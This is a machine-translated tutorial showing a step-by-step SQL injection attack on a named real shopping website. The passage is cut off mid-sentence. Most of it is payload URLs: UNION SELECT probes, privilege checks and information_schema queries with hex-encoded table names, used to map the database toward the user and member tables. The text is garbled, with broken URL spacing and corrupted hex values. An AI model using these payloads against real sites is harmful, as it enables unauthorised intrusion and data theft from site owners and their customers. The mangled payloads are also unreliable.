MySQl injection instance tutorial

A tutorial on injecting an instance to a specified site.

Target Site: http://www.babydaily.com.hk/
Injection point: http://www.babydaily.com.hk/newsDetail.php? Id = 53
First, get the information, add a single quotes submit http://www.babydaily.com.hk/newsDetail.php? Id = 53 ': The following information is returned,
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near at line 1
From this error message, we can judge 2 points. First, we use the MySQL database, and second, set magic_quotes_gpc to on or use the addslashes () function to convert single quotes. however, the former is more likely. Continue, here to check the database version, this is very important, will explain later, submit the http://www.babydaily.com.hk/newsDetail.php? Id = 53% 20and % 201 = 2% 20 union % 20 select % 20 @ version, the following error is returned:
The used SELECT statements have a different number of columns
It seems that the select columns do not match, this uses order by to solve, submit the http://www.babydaily.com.hk/newsDetail.php? Id = 53% 20 order % 20by % 2019 return normal, submit http://www.babydaily.com.hk/newsDetail.php? Id = 53% 20 order % 20by % 2020 returned
Unknown column 20 in order clause, since the number of columns is 19, continue submitting http://www.babydaily.com.hk/newsDetail.php? Id =-1% 20 union % 20 select %, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19 returns 2, 14, 6 characters (here I changed the id to-1, saving the need to write and 1 = 2), and changed 14 to (select @ version) for submission.
Http://www.babydaily.com.hk/newsDetail.php? Id =-1% 20 union % 20 select %, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, (select % 20 @ version), 15, 16, 17, 18, 19, go back to version 5.0.67-community. Check the database Name and replace @ version with database () for submission. Return babydaily_dhost. Similarly, get the current database connection username babydaily_dhost @ localhost and view the MySQL username, submit mysql. user), 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19 "> http://www.babydaily.com.hk/newsDetail.php? Id =-1% 20 union % 20all % 20 select % 201, (select % 20 user % 20 from % 20mysql. user), 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, return
SELECT command denied to user babydaily_dhost @ localhost for table user. The command is denied and the permission is insufficient. If the permission is not administrator, the database table name cannot be viewed, however, after MySQL 5.0, mysql5 is used to store the database system information in the structure of information_schema, which is the reason why you want to view the database version, using this structure, you can view some detailed information about the database, such as, view the current user's permissions, submit http://www.babydaily.com.hk/newsDetail.php? Id =-1% 20 union % 20all % 20 select % 201, grantee, 3, 4, 5, privilege_type, 7, 8, 9, 10, 11, 12, 13, is_grantable, 15, 16, 17, 18, 19% 20 from % 20information_schema.user_privileges
Return Value: babydaily_dhost @ localhost
NO
USAGE
We can see that the permission is quite small. In this way, the loadfile () function cannot be used. I would like to select a sentence into dumpfile (you can also replace it with outfile here, however, if the file output from outfile contains some special characters or some characters are omitted), but after several times, there is always a syntax error. Let's look at the select user name and password honestly, however, currently, the table name and field are unknown. Fortunately, the information_schema structure is available. Here we will briefly introduce this structure:
+ ------------- +
| Tables_in_information_schema |
+ ------------- +
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| KEY_COLUMN_USAGE |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+ ------------- +
Here we only select the tables that can be used in the injection.
| SCHEMATA-> name of the storage database,
| --> Key field: SCHEMA_NAME, indicating the Database Name
| TABLES-> storage table name
| --> Keyword field: TABLE_SCHEMA indicates the name of the database to which the table belongs;
TABLE_NAME indicates the table name.
| COLUMNS-> storage field name
| --> Keyword field: TABLE_SCHEMA indicates the name of the database to which the table belongs;
TABLE_NAME indicates the name of the table to which the table belongs.
COLUMN_NAME indicates the field name,
Well, let's calm down and gradually traverse the table name of the database. After more than n hours of injection, I finally guessed the database's statement, which is the longest injection statement in history:
Http://www.babydaily.com.hk/newsDetail.php? Id =-1% 20 union % 20all % 20 select %
201, table_name, 3, 4, 5, table_schema, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19% 20 from %
20information_schema.tables % 20 where % 20table_schema = database () % 20and % 20table_name % 20! = %
// Only view data related to the current database
200 x 63617465% 20and % 20table_name % 20! = % 200x636F6C6F72% 20and % 20table_name % 20! = %
200x636F75706F6E % 20and % 20table_name % 20! = % 200x63757272656E6379% 20and % 20table_name % 20! = %
200x64657425676e5f696e646578% 20and % 20table_name % 20! = % 200x656D61696C5F636F6E74656E74%
20and % 20table_name % 20! = % 200x666F6F746572% 20and % 20table_name % 20! = % 200x6D656D626572% 20and %
20table_name % 20! = % 200x6E657773% 20and % 20table_name % 20! = % 200 x 70616765% 20and % 20table_name %
20! = % 200x706167655F6D616E616765% 20and % 20table_name % 20! = % 200x7061795F6D616E616765% 20and %
20table_name % 20! = % 200x706F696E7473% 20and % 20table_name % 20! = % 200x701_f64756374% 20and %
20table_name % 20! = % 200x701_f647563745f636f6c6f72% 20and % 20table_name % 20! = % 200x701_f647563745f6f0000000072% 20and % 20table_name % 20! = %
200x70213f647563745f6f00000000725f6974656d % 20and % 20table_name % 20! = %
200x70213f647563745f6f00000000725f737461747573% 20and % 20table_name % 20! = %
200x70213f647563745f70686f746f % 20and % 20table_name % 20! = % 200x636174255f706f696e7473% 20and %
20table_name % 20! = % 200x70213f647563745f70686f746f62616e6e6572% 20and % 20table_name % 20! = %
200x70213f647563745f74257a65% 20and % 20table_name % 20! = % 200x70213f647563745f766964656f %
20and % 20table_name % 20! = % 200x7365745F73746F636B % 20and % 20table_name % 20! = %
200x7425697070696e675f64657374696e6174696f6e % 20and % 20table_name % 20! = %
200x7425697070696e675f64657374696e6174696f6e5f701_f66696c65% 20and % 20table_name % 20! = %
200x7425697070696e675f666565% 20and % 20table_name % 20! = %
200x7425697070696e675f6665655f64657461696c % 20and % 20table_name % 20! = %
200x7109697070696e675f6d6574686f64% 20and % 20table_name % 20! = %
200x73166f7070696e67

5F656D61696C % 20and % 20table_name % 20! = % 200x75736572
Because the program escapes single quotes, it can only be converted to hexadecimal notation or ASCII, but it is too long to replace it with a char statement,
Here, each hexadecimal number represents a table_name, and each listing is added with a where! = Statement. continue to the next one. The final table name is
Table_name
{CHARACTER_SETS, COLLATIONS, COLUMNS, COLUMN_PRIVILEGES, KEY_COLUMN_USAGE,

 

PROFILING, ROUTINES, SCHEMATA, SCHEMA_PRIVILEGES, STATISTICS, TABLES,

TABLE_CONSTRAINTS,

TABLE_PRIVILEGES, TRIGGERS, USER_PRIVILEGES, VIEWS, cash_points, cate, color, coupon, currency,

Design_index, email_content, footer, member, news, page, page_manage, pay_manage, points, product,

Product_color, product_order, product_order_item, product_order_status, product_photo, product_photobanner,

Product_size, product_video, set_stock, shipping_destination, shipping_destination_profile, shipping_destination, ship
Ping_fee_detail, shipping_method, shopping_email, user}
Here, you may say that you do not need to get all the table names. You only need to get the Administrator table. Why not use the limit statement? It works in principle, but the limit statement is applicable to some